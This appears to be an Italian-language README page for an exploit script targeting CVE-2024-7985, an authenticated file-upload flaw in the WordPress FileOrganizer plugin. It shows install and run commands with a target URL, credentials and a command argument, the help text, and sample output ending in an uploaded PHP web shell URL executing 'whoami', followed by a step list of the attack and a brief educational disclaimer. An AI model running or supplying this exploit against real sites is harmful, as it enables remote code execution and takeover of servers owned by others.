
FileOrganizer <= 1.0.9 - Autenticato (Subscriber+) Caricamento Arbitrario di File
FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload
CVE-2024-7985 - Il plugin WordPress FileOrganizer <= 1.0.9 è vulnerabile a upload arbitrari di file autenticati, consentendo ad attaccanti con privilegi Subscriber+ di caricare ed eseguire file dannosi da remoto. Questa vulnerabilità deriva dalla mancata validazione del tipo di file nella funzione fileorganizer_ajax_handler, rendendo possibile l'esecuzione remota di codice (RCE).
🚨 Questo exploit consente agli attaccanti di eseguire comandi arbitrari sul server! 🚨
requestsbeautifulsoup4Installa le dipendenze:
pip install requests beautifulsoup4
python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"
usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]
FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi
options:
-h, --help show this help message and exit
--url URL Target WordPress site URL
--username USERNAME WordPress Username
--password PASSWORD WordPress Password
--cmd CMD Command to execute in uploaded file
[+] Vulnerable version detected: 1.0.9
[+] Logged in successfully!
[+] Extracted nonce: 7b4a95872b
[+] File uploaded successfully!
[+] Access file at: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami
1️⃣ Controllo della versione - Determina se il sito è vulnerabile.
2️⃣ Autenticazione - Accede a WordPress.
3️⃣ Estrazione del nonce - Recupera il token di sicurezza.
4️⃣ Upload del file - Carica uno script PHP dannoso.
5️⃣ Esecuzione del comando - Esegue i comandi specificati dall'utente.
Questo script è destinato esclusivamente a scopi educativi; l'autore non si assume alcuna responsabilità per eventuali usi impropri o conseguenze. 🚨